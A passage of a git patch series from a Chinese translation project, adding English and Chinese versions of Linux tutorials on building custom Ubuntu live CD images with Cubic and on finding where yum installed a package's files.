-In the next section, select the packages that you want to remove from your live image. The selected packages will be automatically removed after the Ubuntu OS has been installed using the custom live image. Please be careful while choosing the packages to remove, you might have unknowingly removed a package that depends on another package.
-
-[![][2]][11]
-
-Now, the live image creation process will start. It will take some time depending upon your system's specifications.
-
-[![][2]][12]
-
-Once the image creation process completed, click Finish. Cubic will display the newly created custom image details.
-
-If you want to modify the newly create custom live image in the future, **uncheck** the option that says **" Delete all project files, except the generated disk image and the corresponding MD5 checksum file"**. Cubic will left the custom image in the project's working directory, you can make any changes in future. You don't have start all over again.
-
-To create a new live image for different Ubuntu versions, use a different project directory.
-
-### Modify Custom Ubuntu Live Cd Image Using Cubic
-
-Launch Cubic from menu, and select an existing project directory. Click the Next button, and you will see the following three options:
-
- 1. Create a disk image from the existing project.
- 2. Continue customizing the existing project.
- 3. Delete the existing project.
-
-
-
-[![][2]][13]
-
-The first option will allow you to create a new live ISO image from your existing project using the same customization you previously made. If you lost your ISO image, you can use the first option to create a new one.
-
-The second option allows you to make any additional changes in your existing project. If you choose this option, you will be landed into chroot environment again. You can add new files or folders, install any new softwares, remove any softwares, add other Linux kernels, add desktop backgrounds and so on.
-
-The third option will delete the existing project, so you can start all over from the beginning. Please that this option will delete all files including the newly generated ISO.
-
-I made a custom Ubuntu 16.04 LTS desktop live cd using Cubic. It worked just fine as described here. If you want to create an Ubuntu live cd, Cubic might be good choice.
-
-Cheers!
-
-
-
---------------------------------------------------------------------------------
-
-via: https://www.ostechnix.com/create-custom-ubuntu-live-cd-image/
-
-作者:[SK][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.ostechnix.com/author/sk/
-[1]:https://www.ostechnix.com/pinguy-builder-build-custom-ubuntu-os/
-[2]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
-[3]:http://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-1.png ()
-[4]:http://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-2.png ()
-[5]:http://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-3.png ()
-[6]:http://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-4.png ()
-[7]:http://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-6.png ()
-[8]:http://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-5.png ()
-[9]:http://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-7.png ()
-[10]:http://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-8.png ()
-[11]:http://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-10-1.png ()
-[12]:http://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-12-1.png ()
-[13]:http://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-13.png ()
diff --git a/translated/tech/20171030 How To Create Custom Ubuntu Live CD Image.md b/translated/tech/20171030 How To Create Custom Ubuntu Live CD Image.md
new file mode 100644
index 0000000000..b90bc3404d
--- /dev/null
+++ b/translated/tech/20171030 How To Create Custom Ubuntu Live CD Image.md
@@ -0,0 +1,157 @@
+如何创建 Ubuntu Live CD (Linux 中国注:Ubuntu 原生光盘)的定制镜像
+======
+![](https://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-720x340.png)
+
+今天让我们来讨论一下如何创建 Ubuntu Live CD 的定制镜像(ISO)。我们已经使用[* *Pinguy Builder* *][1]完成了这项工作。但是,现在似乎停止了。最近 Pinguy Builder 的官方网站似乎没有任何更新。幸运的是,我找到了另一种创建 Ubuntu Live CD 镜像的工具。使用 **Cubic** 即 **C**ustom **Ub**untu **I**SO **C**reator (Linux 中国注:Ubuntu 镜像定制器)的首字母所写,一个 GUI (图形用户界面)应用程序用来创建一个可定制的可启动的 Ubuntu Live CD(ISO)镜像。
+
+Cubic 正在积极开发,它提供了许多选项来轻松地创建一个定制的 Ubuntu Live CD ,它有一个集成的命令行环境``chroot``(Linux 中国注:Change Root,也就是改变程序执行时所参考的根目录位置),在那里你可以定制所有,比如安装新的软件包,内核,添加更多的背景壁纸,添加更多的文件和文件夹。它有一个直观的 GUI 界面,在实时镜像创建过程中可以轻松的利用导航(可以利用点击鼠标来回切换)。您可以创建一个新的自定义镜像或修改现有的项目。因为它可以用来实时制作 Ubuntu 镜像,所以我相信它可以被利用在制作其他 Ubuntu 的发行版和衍生版镜像中使用,比如 Linux Mint。
+### 安装 Cubic
+
+Cubic 的开发人员已经开发出了一个 PPA (Linux 中国注:Personal Package Archives 首字母简写,私有的软件包档案) 来简化安装过程。要在 Ubuntu 系统上安装 Cubic ,在你的终端上运行以下命令:
+```
+sudo apt-add-repository ppa:cubic-wizard/release
+```
+```
+sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 6494C6D6997C215E
+```
+```
+sudo apt update
+```
+```
+sudo apt install cubic
+```
+
+### 利用 Cubic 创建 Ubuntu Live CD 的定制镜像
+
+
+安装完成后,从应用程序菜单或坞站启动 Cubic。这是在我在 Ubuntu 16.04 LTS 桌面系统中 Cubic 的样子。
+
+为新项目选择一个目录。它是保存镜像文件的目录。
+[![][2]][3]
+
+请注意,Cubic 不是创建您系统的 Live CD 镜像。而它只是利用 Ubuntu 安装 CD 来创建一个定制的 Live CD,因此,你应该有一个最新的 ISO 镜像。
+选择您存储 Ubuntu 安装 ISO 镜像的路径。Cubic 将自动填写您定制操作系统的所有细节。如果你愿意,你可以改变细节。单击 Next 继续。
+[![][2]][4]
+
+
+接下来,从压缩的源安装介质中的 Linux 文件系统将被提取到项目的目录(在我们的例子中目录的位置是 **/home/ostechnix/custom_ubuntu**)。
+[![][2]][5]
+
+
+一旦文件系统被提取出来,将自动加载到``chroot``环境。如果你没有看到终端提示,按下回车键几次。
+[![][2]][6]
+
+
+在这里可以安装任何额外的软件包,添加背景图片,添加软件源列表,添加最新的 Linux 内核和所有其他定制到你的 Live CD 。
+
+例如,我希望 `vim` 安装在我的 Live CD 中,所以现在就要安装它。
+[![][2]][7]
+
+
+我们不需要使用 ``sudo``,因为我们已经在具有最高权限(root)的环境中了。
+
+类似地,如果需要,可以安装添加的任何版本 Linux Kernel 。
+```
+apt install linux-image-extra-4.10.0-24-generic
+```
+
+此外,您还可以更新软件源列表(添加或删除软件存储库列表):
+[![][2]][8]
+
+修改源列表后,不要忘记运行 ``apt update`` 命令来更新源列表:
+```
+apt update
+```
+
+
+另外,您还可以向 Live CD 中添加文件或文件夹。复制文件/文件夹(右击它们并选择复制或者利用 `CTRL+C`),在终端右键单击(在 Cubic 窗口内),选择**Paste file(s)**,最后点击它将其复制进 Cubic 向导的底部。
+[![][2]][9]
+
+**Ubuntu 17.10 用户注意事项: **
+
+
+在 Ubuntu 17.10 系统中,DNS 查询可能无法在 ``chroot``环境中工作。如果您正在制作一个定制的 Ubuntu 17.10 原生镜像,您需要指向正确的 `resolve.conf` 配置文件:
+```
+ln -sr /run/systemd/resolve/resolv.conf /run/systemd/resolve/stub-resolv.conf
+
+```
+
+验证 DNS 解析工作,运行:
+```
+cat /etc/resolv.conf
+ping google.com
+```
+
+
+如果你想的话,可以添加你自己的壁纸。要做到这一点,请切换到 **/usr/share/backgrounds/** 目录,
+```
+cd /usr/share/backgrounds
+```
+
+
+并将图像拖放到 Cubic 窗口中。或复制图像,右键单击 Cubic 终端窗口,选择 **Paste file(s)** 选项。此外,确保你在**/usr/share/gnome-backproperties** 的XML文件中添加了新的壁纸,这样你可以在桌面上右键单击新添加的图像选择**Change Desktop Background** 进行交互。完成所有更改后,在 Cubic 向导中单击 ``Next``。
+
+接下来,选择引导到新的原生 ISO 镜像时使用的 Linux 内核版本。如果已经安装了其他版本内核,它们也将在这部分中被列出。然后选择您想在 Live CD 中使用的内核。
+[![][2]][10]
+
+
+在下一节中,选择要从您的原生映像中删除的软件包。在使用定制的原生映像安装完 Ubuntu 操作系统后,所选的软件包将自动删除。在选择要删除的软件包时,要格外小心,您可能在不知不觉中删除了一个软件包,而此软件包又是另外一个软件包的依赖包。
+[![][2]][11]
+
+
+接下来,原生镜像创建过程将开始。这里所要花费的时间取决于你定制的系统规格。
+[![][2]][12]
+
+
+镜像创建完成后后,单击 ``Finish``。Cubic 将显示新创建的自定义镜像的细节。
+
+如果你想在将来修改刚刚创建的自定义原生镜像,**uncheck** 选项解释说**" Delete all project files, except the generated disk image and the corresponding MD5 checksum file"** (**除了生成的磁盘映像和相应的MD5校验和文件之外,删除所有的项目文件**) Cubic 将在项目的工作目录中保留自定义图像,您可以在将来进行任何更改。而不用从头再来一遍。
+
+要为不同的 Ubuntu 版本创建新的原生镜像,最好使用不同的项目目录。
+### 利用 Cubic 修改 Ubuntu Live CD 的定制镜像
+
+从菜单中启动 Cubic ,并选择一个现有的项目目录。单击 Next 按钮,您将看到以下三个选项:
+ 1. 从现有项目创建一个磁盘映像。
+ 2. 继续定制现有项目。
+ 3. 删除当前项目。
+
+
+
+[![][2]][13]
+
+
+第一个选项将允许您使用之前所做的自定义在现有项目中创建一个新的原生 ISO 镜像。如果您丢失了 ISO 镜像,您可以使用第一个选项来创建一个新的。
+
+第二个选项允许您在现有项目中进行任何其他更改。如果您选择此选项,您将再次进入 ``chroot``环境。您可以添加新的文件或文件夹,安装任何新的软件,删除任何软件,添加其他的 Linux 内核,添加桌面背景等等。
+
+第三个选项将删除现有的项目,所以您可以从头开始。选择此选项将删除所有文件,包括新生成的 ISO 镜像文件。
+
+我用 Cubic 做了一个定制的 Ubuntu 16.04 LTS 桌面 Live CD 。就像这篇文章里描述的一样。如果你想创建一个 Ubuntu Live CD, Cubic 可能是一个不错的选择。
+
+就这些了,再会!
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.ostechnix.com/create-custom-ubuntu-live-cd-image/
+
+作者:[SK][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.ostechnix.com/author/sk/
+[1]:https://www.ostechnix.com/pinguy-builder-build-custom-ubuntu-os/
+[2]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
+[3]:http://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-1.png ()
+[4]:http://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-2.png ()
+[5]:http://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-3.png ()
+[6]:http://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-4.png ()
+[7]:http://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-6.png ()
+[8]:http://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-5.png ()
+[9]:http://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-7.png ()
+[10]:http://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-8.png ()
+[11]:http://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-10-1.png ()
+[12]:http://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-12-1.png ()
+[13]:http://www.ostechnix.com/wp-content/uploads/2017/10/Cubic-13.png ()
From 45ff56ccef165a6d3238c17749a757ffbbe1e9e6 Mon Sep 17 00:00:00 2001
From: stevenzdg988
Date: Mon, 8 Jan 2018 14:40:25 +0800
Subject: [PATCH 168/371] Translated by stevenzdg988 on 20171030\ How\ To\
Create\ Custom\ Ubuntu\ Live\ CD\ Image.md
---
.../tech/20171030 How To Create Custom Ubuntu Live CD Image.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/translated/tech/20171030 How To Create Custom Ubuntu Live CD Image.md b/translated/tech/20171030 How To Create Custom Ubuntu Live CD Image.md
index b90bc3404d..2a6dad8027 100644
--- a/translated/tech/20171030 How To Create Custom Ubuntu Live CD Image.md
+++ b/translated/tech/20171030 How To Create Custom Ubuntu Live CD Image.md
@@ -136,7 +136,7 @@ cd /usr/share/backgrounds
via: https://www.ostechnix.com/create-custom-ubuntu-live-cd-image/
作者:[SK][a]
-译者:[译者ID](https://github.com/译者ID)
+译者:[stevenzdg988](https://github.com/stevenzdg988)
校对:[校对者ID](https://github.com/校对者ID)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From 9e6b6cb51e6d9718a15097c68428ae70414588c2 Mon Sep 17 00:00:00 2001
From: cyleung
Date: Mon, 8 Jan 2018 15:06:26 +0800
Subject: [PATCH 169/371] translated "yum find out path where is package
installed to on CentOS/RHEL"
---
... is package installed to on CentOS-RHEL.md | 154 ------------------
... is package installed to on CentOS-RHEL.md | 1 +
2 files changed, 1 insertion(+), 154 deletions(-)
delete mode 100644 sources/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md
create mode 100644 translated/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md
diff --git a/sources/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md b/sources/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md
deleted file mode 100644
index 9f9b896d6a..0000000000
--- a/sources/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md
+++ /dev/null
@@ -1,154 +0,0 @@
-translating by cyleung
-yum find out path where is package installed to on CentOS/RHEL
-======
-
-I have [install htop package on a CentOS/RHEL][1] . I wanted find out where and at what path htop package installed all files. Is there an easy way to tell yum where is package installed on a CentOS/RHEL?
-
-[yum command][2] is an interactive, open source, rpm based, package manager for a CentOS/RHEL and clones. It can automatically perform the following operations for you:
-
- 1. Core system file updates
- 2. Package updates
- 3. Install a new packages
- 4. Delete of old packages
- 5. Perform queries on the installed and/or available packages
-
-yum is similar to other high level package managers like [apt-get command][3]/[apt command][4].
-
-### yum where is package installed
-
-The syntax is as follows to install htop package for a demo purpose:
-
-`# yum install htop`
-
-To list the files installed by a yum package called htop, run the following rpm command:
-
-```
-# rpm -q {packageNameHere}
-# rpm -ql htop
-```
-
-Sample outputs:
-
-```
-/usr/bin/htop
-/usr/share/doc/htop-2.0.2
-/usr/share/doc/htop-2.0.2/AUTHORS
-/usr/share/doc/htop-2.0.2/COPYING
-/usr/share/doc/htop-2.0.2/ChangeLog
-/usr/share/doc/htop-2.0.2/README
-/usr/share/man/man1/htop.1.gz
-/usr/share/pixmaps/htop.png
-
-```
-
-### How to see the files installed by a yum package using repoquery command
-
-First install yum-utils package using [yum command][2]:
-
-```
-# yum install yum-utils
-```
-
-Sample outputs:
-
-```
-Resolving Dependencies
---> Running transaction check
----> Package yum-utils.noarch 0:1.1.31-42.el7 will be installed
---> Processing Dependency: python-kitchen for package: yum-utils-1.1.31-42.el7.noarch
---> Processing Dependency: libxml2-python for package: yum-utils-1.1.31-42.el7.noarch
---> Running transaction check
----> Package libxml2-python.x86_64 0:2.9.1-6.el7_2.3 will be installed
----> Package python-kitchen.noarch 0:1.1.1-5.el7 will be installed
---> Finished Dependency Resolution
-
-Dependencies Resolved
-
-=======================================================================================
- Package Arch Version Repository Size
-=======================================================================================
-Installing:
- yum-utils noarch 1.1.31-42.el7 rhui-rhel-7-server-rhui-rpms 117 k
-Installing for dependencies:
- libxml2-python x86_64 2.9.1-6.el7_2.3 rhui-rhel-7-server-rhui-rpms 247 k
- python-kitchen noarch 1.1.1-5.el7 rhui-rhel-7-server-rhui-rpms 266 k
-
-Transaction Summary
-=======================================================================================
-Install 1 Package (+2 Dependent packages)
-
-Total download size: 630 k
-Installed size: 3.1 M
-Is this ok [y/d/N]: y
-Downloading packages:
-(1/3): python-kitchen-1.1.1-5.el7.noarch.rpm | 266 kB 00:00:00
-(2/3): libxml2-python-2.9.1-6.el7_2.3.x86_64.rpm | 247 kB 00:00:00
-(3/3): yum-utils-1.1.31-42.el7.noarch.rpm | 117 kB 00:00:00
----------------------------------------------------------------------------------------
-Total 1.0 MB/s | 630 kB 00:00
-Running transaction check
-Running transaction test
-Transaction test succeeded
-Running transaction
- Installing : python-kitchen-1.1.1-5.el7.noarch 1/3
- Installing : libxml2-python-2.9.1-6.el7_2.3.x86_64 2/3
- Installing : yum-utils-1.1.31-42.el7.noarch 3/3
- Verifying : libxml2-python-2.9.1-6.el7_2.3.x86_64 1/3
- Verifying : yum-utils-1.1.31-42.el7.noarch 2/3
- Verifying : python-kitchen-1.1.1-5.el7.noarch 3/3
-
-Installed:
- yum-utils.noarch 0:1.1.31-42.el7
-
-Dependency Installed:
- libxml2-python.x86_64 0:2.9.1-6.el7_2.3 python-kitchen.noarch 0:1.1.1-5.el7
-
-Complete!
-```
-
-
-### How do I list the contents of a installed package using YUM?
-
-Now run repoquery command as follows:
-
-`# repoquery --list htop`
-
-OR
-
-`# repoquery -l htop`
-
-Sample outputs:
-
-[![yum where is package installed][5]][5]
-
-You can also use the type command or command command to just find location of given binary file such as httpd or htop:
-
-```
-$ type -a httpd
-$ type -a htop
-$ command -V htop
-```
-
-### about the author
-
-The author is the creator of nixCraft and a seasoned sysadmin and a trainer for the Linux operating system/Unix shell scripting. He has worked with global clients and in various industries, including IT, education, defense and space research, and the nonprofit sector. Follow him on [Twitter][6], [Facebook][7], [Google+][8].
-
---------------------------------------------------------------------------------
-
-via: https://www.cyberciti.biz/faq/yum-determining-finding-path-that-yum-package-installed-to/
-
-作者:[][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.cyberciti.biz
-[1]:https://www.cyberciti.biz/faq/centos-redhat-linux-install-htop-command-using-yum/
-[2]:https://www.cyberciti.biz/faq/rhel-centos-fedora-linux-yum-command-howto/ (See Linux/Unix yum command examples for more info)
-[3]:https://www.cyberciti.biz/tips/linux-debian-package-management-cheat-sheet.html (See Linux/Unix apt-get command examples for more info)
-[4]:https://www.cyberciti.biz/faq/ubuntu-lts-debian-linux-apt-command-examples/ (See Linux/Unix apt command examples for more info)
-[5]:https://www.cyberciti.biz/media/new/faq/2018/01/yum-where-is-package-installed.jpg
-[6]:https://twitter.com/nixcraft
-[7]:https://facebook.com/nixcraft
-[8]:https://plus.google.com/+CybercitiBiz
diff --git a/translated/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md b/translated/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md
new file mode 100644
index 0000000000..a5d548eae1
--- /dev/null
+++ b/translated/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md
@@ -0,0 +1 @@
+在 CentOS/RHEL 上查找 yum 安裝软件的位置
======
我已经在 CentOS/RHEL 上[安装 htop][1] 。现在想知道软件被安装在哪个位置。有没有简单的方法能找到软件包安装的目录呢?
[yum 命令][2] 是可交互的,开源的,基于 rpm 的 CentOS/RHEL 的软件包管理工具。它会帮助你自动地完成以下操作:
1. 操作系统内核更新
2. 软件包更新
3. 安装新的软件包
4. 删除旧的软件包
5. 查找已安装和可用的软件包
和 yum 相似的软件包管理工具有: [apt-get command][3] 和 [apt command][4]。
### yum 安装软件包的位置
我们以安装 htop 为例:
```
# yum install htop
```
使用以下命令列出 yum 安装 htop 的文件:
```
# rpm -q {packageNameHere}
# rpm -ql htop
```
输出例子:
```
/usr/bin/htop
/usr/share/doc/htop-2.0.2
/usr/share/doc/htop-2.0.2/AUTHORS
/usr/share/doc/htop-2.0.2/COPYING
/usr/share/doc/htop-2.0.2/ChangeLog
/usr/share/doc/htop-2.0.2/README
/usr/share/man/man1/htop.1.gz
/usr/share/pixmaps/htop.png
```
### 如何使用 repoquery 命令查看 yum 安装的软件包的位置
首先使用 [yum 命令][2] 安装 yum-utils 软件包:
```
# yum install yum-utils
```
例子输出:
```
Resolving Dependencies
--> Running transaction check
---> Package yum-utils.noarch 0:1.1.31-42.el7 will be installed
--> Processing Dependency: python-kitchen for package: yum-utils-1.1.31-42.el7.noarch
--> Processing Dependency: libxml2-python for package: yum-utils-1.1.31-42.el7.noarch
--> Running transaction check
---> Package libxml2-python.x86_64 0:2.9.1-6.el7_2.3 will be installed
---> Package python-kitchen.noarch 0:1.1.1-5.el7 will be installed
--> Finished Dependency Resolution
Dependencies Resolved
=======================================================================================
Package Arch Version Repository Size
=======================================================================================
Installing:
yum-utils noarch 1.1.31-42.el7 rhui-rhel-7-server-rhui-rpms 117 k
Installing for dependencies:
libxml2-python x86_64 2.9.1-6.el7_2.3 rhui-rhel-7-server-rhui-rpms 247 k
python-kitchen noarch 1.1.1-5.el7 rhui-rhel-7-server-rhui-rpms 266 k
Transaction Summary
=======================================================================================
Install 1 Package (+2 Dependent packages)
Total download size: 630 k
Installed size: 3.1 M
Is this ok [y/d/N]: y
Downloading packages:
(1/3): python-kitchen-1.1.1-5.el7.noarch.rpm | 266 kB 00:00:00
(2/3): libxml2-python-2.9.1-6.el7_2.3.x86_64.rpm | 247 kB 00:00:00
(3/3): yum-utils-1.1.31-42.el7.noarch.rpm | 117 kB 00:00:00
---------------------------------------------------------------------------------------
Total 1.0 MB/s | 630 kB 00:00
Running transaction check
Running transaction test
Transaction test succeeded
Running transaction
Installing : python-kitchen-1.1.1-5.el7.noarch 1/3
Installing : libxml2-python-2.9.1-6.el7_2.3.x86_64 2/3
Installing : yum-utils-1.1.31-42.el7.noarch 3/3
Verifying : libxml2-python-2.9.1-6.el7_2.3.x86_64 1/3
Verifying : yum-utils-1.1.31-42.el7.noarch 2/3
Verifying : python-kitchen-1.1.1-5.el7.noarch 3/3
Installed:
yum-utils.noarch 0:1.1.31-42.el7
Dependency Installed:
libxml2-python.x86_64 0:2.9.1-6.el7_2.3 python-kitchen.noarch 0:1.1.1-5.el7
Complete!
```
### 如何列出通过 yum 安装的命令?
使用 repoquery 命令:
`# repoquery --list htop`
或者
`# repoquery -l htop`
例子输出:
[![yum where is package installed][5]][5]
你也可以使用 type 命令或者 command 命令查找指定二进制文件的位置,例如 httpd 或者 htop :
```
$ type -a httpd
$ type -a htop
$ command -V htop
```
### 关于作者
作者是 nixCraft 的创始人,是经验丰富的系统管理员并且是 Linux 命令行脚本编程的教练。他拥有全球多行业合作的经验,客户包括 IT,教育,安防和空间研究。他的联系方式:[Twitter][6], [Facebook][7], [Google+][8]。
--------------------------------------------------------------------------------
via: https://www.cyberciti.biz/faq/yum-determining-finding-path-that-yum-package-installed-to/
作者:[][a]
译者:[译者 ID](https://github.com/cyleung)
校对:[校对者 ID](https://github.com/ 校对者 ID)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux 中国](https://linux.cn/) 荣誉推出
[a]:https://www.cyberciti.biz
[1]:https://www.cyberciti.biz/faq/centos-redhat-linux-install-htop-command-using-yum/
[2]:https://www.cyberciti.biz/faq/rhel-centos-fedora-linux-yum-command-howto/ (See Linux/Unix yum command examples for more info)
[3]:https://www.cyberciti.biz/tips/linux-debian-package-management-cheat-sheet.html (See Linux/Unix apt-get command examples for more info)
[4]:https://www.cyberciti.biz/faq/ubuntu-lts-debian-linux-apt-command-examples/ (See Linux/Unix apt command examples for more info)
[5]:https://www.cyberciti.biz/media/new/faq/2018/01/yum-where-is-package-installed.jpg
[6]:https://twitter.com/nixcraft
[7]:https://facebook.com/nixcraft
[8]:https://plus.google.com/+CybercitiBiz
\ No newline at end of file
From 5e3f01a110f62526ee86d3806f3faf6fe24d28f7 Mon Sep 17 00:00:00 2001
From: cyleung
Date: Mon, 8 Jan 2018 15:25:05 +0800
Subject: [PATCH 170/371] =?UTF-8?q?=E4=BF=AE=E5=A4=8D=E6=8D=A2=E8=A1=8C?=
=?UTF-8?q?=E7=AC=A6?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
... is package installed to on CentOS-RHEL.md | 159 +++++++++++++++++-
1 file changed, 158 insertions(+), 1 deletion(-)
diff --git a/translated/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md b/translated/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md
index a5d548eae1..770b2cbe05 100644
--- a/translated/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md
+++ b/translated/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md
@@ -1 +1,158 @@
-在 CentOS/RHEL 上查找 yum 安裝软件的位置
======
我已经在 CentOS/RHEL 上[安装 htop][1] 。现在想知道软件被安装在哪个位置。有没有简单的方法能找到软件包安装的目录呢?
[yum 命令][2] 是可交互的,开源的,基于 rpm 的 CentOS/RHEL 的软件包管理工具。它会帮助你自动地完成以下操作:
1. 操作系统内核更新
2. 软件包更新
3. 安装新的软件包
4. 删除旧的软件包
5. 查找已安装和可用的软件包
和 yum 相似的软件包管理工具有: [apt-get command][3] 和 [apt command][4]。
### yum 安装软件包的位置
我们以安装 htop 为例:
```
# yum install htop
```
使用以下命令列出 yum 安装 htop 的文件:
```
# rpm -q {packageNameHere}
# rpm -ql htop
```
输出例子:
```
/usr/bin/htop
/usr/share/doc/htop-2.0.2
/usr/share/doc/htop-2.0.2/AUTHORS
/usr/share/doc/htop-2.0.2/COPYING
/usr/share/doc/htop-2.0.2/ChangeLog
/usr/share/doc/htop-2.0.2/README
/usr/share/man/man1/htop.1.gz
/usr/share/pixmaps/htop.png
```
### 如何使用 repoquery 命令查看 yum 安装的软件包的位置
首先使用 [yum 命令][2] 安装 yum-utils 软件包:
```
# yum install yum-utils
```
例子输出:
```
Resolving Dependencies
--> Running transaction check
---> Package yum-utils.noarch 0:1.1.31-42.el7 will be installed
--> Processing Dependency: python-kitchen for package: yum-utils-1.1.31-42.el7.noarch
--> Processing Dependency: libxml2-python for package: yum-utils-1.1.31-42.el7.noarch
--> Running transaction check
---> Package libxml2-python.x86_64 0:2.9.1-6.el7_2.3 will be installed
---> Package python-kitchen.noarch 0:1.1.1-5.el7 will be installed
--> Finished Dependency Resolution
Dependencies Resolved
=======================================================================================
Package Arch Version Repository Size
=======================================================================================
Installing:
yum-utils noarch 1.1.31-42.el7 rhui-rhel-7-server-rhui-rpms 117 k
Installing for dependencies:
libxml2-python x86_64 2.9.1-6.el7_2.3 rhui-rhel-7-server-rhui-rpms 247 k
python-kitchen noarch 1.1.1-5.el7 rhui-rhel-7-server-rhui-rpms 266 k
Transaction Summary
=======================================================================================
Install 1 Package (+2 Dependent packages)
Total download size: 630 k
Installed size: 3.1 M
Is this ok [y/d/N]: y
Downloading packages:
(1/3): python-kitchen-1.1.1-5.el7.noarch.rpm | 266 kB 00:00:00
(2/3): libxml2-python-2.9.1-6.el7_2.3.x86_64.rpm | 247 kB 00:00:00
(3/3): yum-utils-1.1.31-42.el7.noarch.rpm | 117 kB 00:00:00
---------------------------------------------------------------------------------------
Total 1.0 MB/s | 630 kB 00:00
Running transaction check
Running transaction test
Transaction test succeeded
Running transaction
Installing : python-kitchen-1.1.1-5.el7.noarch 1/3
Installing : libxml2-python-2.9.1-6.el7_2.3.x86_64 2/3
Installing : yum-utils-1.1.31-42.el7.noarch 3/3
Verifying : libxml2-python-2.9.1-6.el7_2.3.x86_64 1/3
Verifying : yum-utils-1.1.31-42.el7.noarch 2/3
Verifying : python-kitchen-1.1.1-5.el7.noarch 3/3
Installed:
yum-utils.noarch 0:1.1.31-42.el7
Dependency Installed:
libxml2-python.x86_64 0:2.9.1-6.el7_2.3 python-kitchen.noarch 0:1.1.1-5.el7
Complete!
```
### 如何列出通过 yum 安装的命令?
使用 repoquery 命令:
`# repoquery --list htop`
或者
`# repoquery -l htop`
例子输出:
[![yum where is package installed][5]][5]
你也可以使用 type 命令或者 command 命令查找指定二进制文件的位置,例如 httpd 或者 htop :
```
$ type -a httpd
$ type -a htop
$ command -V htop
```
### 关于作者
作者是 nixCraft 的创始人,是经验丰富的系统管理员并且是 Linux 命令行脚本编程的教练。他拥有全球多行业合作的经验,客户包括 IT,教育,安防和空间研究。他的联系方式:[Twitter][6], [Facebook][7], [Google+][8]。
--------------------------------------------------------------------------------
via: https://www.cyberciti.biz/faq/yum-determining-finding-path-that-yum-package-installed-to/
作者:[][a]
译者:[译者 ID](https://github.com/cyleung)
校对:[校对者 ID](https://github.com/ 校对者 ID)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux 中国](https://linux.cn/) 荣誉推出
[a]:https://www.cyberciti.biz
[1]:https://www.cyberciti.biz/faq/centos-redhat-linux-install-htop-command-using-yum/
[2]:https://www.cyberciti.biz/faq/rhel-centos-fedora-linux-yum-command-howto/ (See Linux/Unix yum command examples for more info)
[3]:https://www.cyberciti.biz/tips/linux-debian-package-management-cheat-sheet.html (See Linux/Unix apt-get command examples for more info)
[4]:https://www.cyberciti.biz/faq/ubuntu-lts-debian-linux-apt-command-examples/ (See Linux/Unix apt command examples for more info)
[5]:https://www.cyberciti.biz/media/new/faq/2018/01/yum-where-is-package-installed.jpg
[6]:https://twitter.com/nixcraft
[7]:https://facebook.com/nixcraft
[8]:https://plus.google.com/+CybercitiBiz
\ No newline at end of file
+在 CentOS/RHEL 上查找 yum 安裝软件的位置
+======
+
+我已经在 CentOS/RHEL 上[安装 htop][1] 。现在想知道软件被安装在哪个位置。有没有简单的方法能找到软件包安装的目录呢?
+
+[yum 命令][2] 是可交互的,开源的,基于 rpm 的 CentOS/RHEL 的软件包管理工具。它会帮助你自动地完成以下操作:
+
+ 1. 操作系统内核更新
+ 2. 软件包更新
+ 3. 安装新的软件包
+ 4. 删除旧的软件包
+ 5. 查找已安装和可用的软件包
+
+和 yum 相似的软件包管理工具有: [apt-get command][3] 和 [apt command][4]。
+
+### yum 安装软件包的位置
+
+我们以安装 htop 为例:
+
+```
+# yum install htop
+```
+
+
